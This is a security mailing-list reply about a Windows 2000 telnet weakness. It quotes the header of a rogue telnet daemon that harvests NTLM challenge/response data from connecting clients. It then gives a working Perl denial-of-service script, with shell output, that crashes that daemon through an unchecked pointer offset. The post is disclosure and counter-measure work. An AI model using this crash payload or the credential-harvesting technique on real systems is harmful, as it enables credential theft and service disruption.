Re: Win2k Telnet.exe malicious server vulnerability

[Jim Paris <jim () JTAN COM>]

> /* NTLM telnetD v0.8
>
>    Snarfs NTLM challenge/response by convincing w2k telnet client to
>    auto-authenticate.
>    Outputs auth-data in LophtCrack sniff format on stdout.
>
>    compile: gcc -o w2kteld ntlm_telnetd.c
>    run: ./w2kteld
>
>    Then wait for w2k to telnet to you.
>    for the impatient, there are always ways of making w2k telnet!

...
<snip>

And if you happen to get bitten by this rogue server,
it must be time for a friendly little DoS against it.
(rp->upos is used as a pointer modifier without checking its bounds)

sardegna:~$ ./ntlm_telnetd -l 1234 & ( sleep 1; perl killit.pl )
[1] 23535
[ Fake NTLM Telnet Daemon - by yeza ]
Listening on port 1234
Awaiting connections

Connection from: 127.0.0.1
Got NTLM response token
[1]+  Segmentation fault      ./ntlm_telnetd -l 1234
sardegna:~$

We are so batman.  And now I'm late for class.  (grr, 6.003)

-jim


#!/usr/bin/perl -w
#
# anti-ntlm-telnetd by jim@jtan
use IO::Socket;
my($s, $msg);
$s=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'localhost:1234') or die;
$s->recv($msg,1024);
$s->send("\xff\xfb\x25");
$s->recv($msg,1024);
$s->send("\xff\xfd");
$s->send("A"x7 .               # foo
         "\xFF" .              # length (passed to gettoken)
         "A"x7 .               # bar
         "NTLMSSP\0\x03" .     # protocol and type
         "A"x29 .              # baz
         "\xDE\xAD\xBE\xEF");  # rp->upos